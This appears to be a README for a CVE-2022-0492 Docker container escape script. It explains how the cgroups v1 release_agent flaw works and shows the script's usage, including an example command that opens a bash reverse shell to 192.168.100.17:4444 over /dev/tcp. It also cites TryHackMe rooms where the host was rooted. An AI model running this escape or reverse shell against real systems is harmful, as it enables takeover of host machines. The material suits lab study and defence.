Exploiting the vulnerability requires the attacker to have access to a Docker container running on a vulnerable system. Once exploited, the attacker can escape the container and gain complete control over the host system.
A vulnerability was found in the Linux kernel’s cgroup_release_agent_write in the kernel/cgroup/cgroup-v1.c function. This flaw, under certain circumstances, allows the use of the cgroups v1 release_agent feature to escalate privileges and bypass the namespace isolation unexpectedly.
More simply put, cgroups v1 has a feature called release_agent that runs a program when a process in the cgroup terminates. If notify_on_release is enabled, the kernel runs the release_agent binary as root. By editing the release_agent file, an attacker can execute their own binary with elevated privileges, taking control of the system. However, the release_agent file is owned by root, so only a user with root access can modify it.
# sh CVE-2022-0492.sh
[>] CVE-2022-0492 Docker Container Escape V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
sh CVE-2022-0492.sh --checker Verify if system is vulnerable.
sh CVE-2022-0492.sh -c|--command <COMMAND> Execute command on host machine.
sh CVE-2022-0492.sh -h|--help Print the help panel.
[>] Example:
sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'
Hamlet from TryHackMe
Root user in host machine pwned by disabling UFW and then sent a reverse shell.
Misguided Ghosts from TryHackMe
Root user in host machine pwned by setting SUID to bash, also sent reverse shell.
